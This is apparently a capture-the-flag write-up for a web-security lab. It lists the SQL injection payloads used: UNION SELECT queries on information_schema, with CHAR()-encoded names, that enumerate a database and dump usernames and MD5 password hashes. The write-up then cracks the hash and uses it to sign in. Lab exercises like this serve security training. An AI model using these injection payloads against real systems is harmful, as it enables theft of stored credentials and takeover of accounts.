in /?page=signin
we can go on search member page to see all databases

1 UNION SELECT 1, schema_name FROM information_schema.schemata;
we can see a schema named Member_Brute_Force

1 UNION SELECT 1, TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = CHAR(77,101,109,98,101,114,95,66,114,117,116,101,95,70,111,114,99,101)
it has one table named db_default

1 UNION SELECT 1, COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = CHAR(77,101,109,98,101,114,95,66,114,117,116,101,95,70,111,114,99,101)  AND TABLE_NAME = CHAR(100,98,95,100,101,102,97,117,108,116)
it has two colums username and password

1 UNION SELECT username, password FROM Member_Brute_Force.db_default
First name: root
Surname : 3bf1114a986ba87ed28fc1b5884fc2f8
First name: admin
Surname : 3bf1114a986ba87ed28fc1b5884fc2f8
the password is md5 of shadow
we can return to /?page=signin and get the flag
